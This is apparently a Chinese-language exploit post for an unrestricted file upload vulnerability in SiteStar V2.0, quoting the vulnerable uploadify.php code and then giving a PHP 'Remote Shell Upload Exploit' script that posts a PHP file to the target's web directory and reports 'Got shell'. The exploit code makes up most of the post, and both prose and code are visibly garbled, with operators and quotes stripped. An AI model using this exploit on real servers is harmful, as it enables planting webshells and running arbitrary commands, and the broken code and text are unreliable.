建站之星SiteStar V2.0 上传破绽






SiteStar V2.0不准确限度文件的上传，远程攻打者可能应用此漏洞上传任意文件到Web目录，终极导致在服务器上履行任意命令。





漏洞发生在 /script/multiupload/uploadify.php文件：

php

if (!empty($_FILES)) {

$tempFile $_FILES.'Filedata'..'tmp_name'.;

$targetPath $_SERVER.'DOCUMENT_ROOT'. . $_POST.'folder'. . '/';

$targetFile str_replace('//','/',$targetPath) . $_FILES.'Filedata'..'name'.;

// 解决Windows中文文件名乱码

if (preg_match( /^WIN/i , PHP_OS)) {

$targetFile iconv('UTF8', 'GBK', $targetFile);

}

move_uploaded_file($tempFile, $targetFile);

echo 1 ;

}





没什么好说的，初级失误。通过结构html表单可直接上传webshell至web目录，下面供给一段测试代码。EXP：





print_r('

++

SiteStar V2.0 Remote Shell Upload Exploit

++

');

if ($argc 3)

{

print \nUsage: php $argv.0. host path\n ;

print Example: php $argv.0. localhost /sitestar/\n ;

die();

}

error_reporting(0);

set_time_limit(0);

$host $argv.1.;

$path $argv.2.;

$shell ''.$host.$path.'cnryan.php';

$payload cnryan\r\n ;

$payload . ContentDisposition: formdata; name\ Filedata\ ; filename\ cnryan.php\ \r\n ;

$payload . ContentType: application/octetstream\r\n\r\n ;

$payload . php phpinfo(); W.S.T\r\ncnryan\r\n ;

$payload . ContentDisposition: formdata; name\ upload\ \r\n\r\n\r\n ;

$payload . cnryan\r\n ;

$payload . ContentDisposition: formdata; name\ folder\ \r\n\r\n ;

$payload . $path\r\n ;

$payload . cnryan ;

$packet POST {$path}/script/multiupload/uploadify.php HTTP/1.0\r\n ;

$packet . Host: {$host}\r\n ;

$packet . Connection: keepalive\r\n ;

$packet . ContentType: multipart/formdata; boundarycnryan\r\n ;

$packet . ContentLength: .strlen($payload). \r\n\r\n ;

$packet . $payload;

$fp fsockopen($host, 80);

fputs($fp, $packet);



sleep(5);

$strfile_get_contents($shell);

if(strpos($str,'W.S.T'))

exit( OK! Got shell:\t$shell\n );

else

exit( Exploit Failed!\n );











by cnryan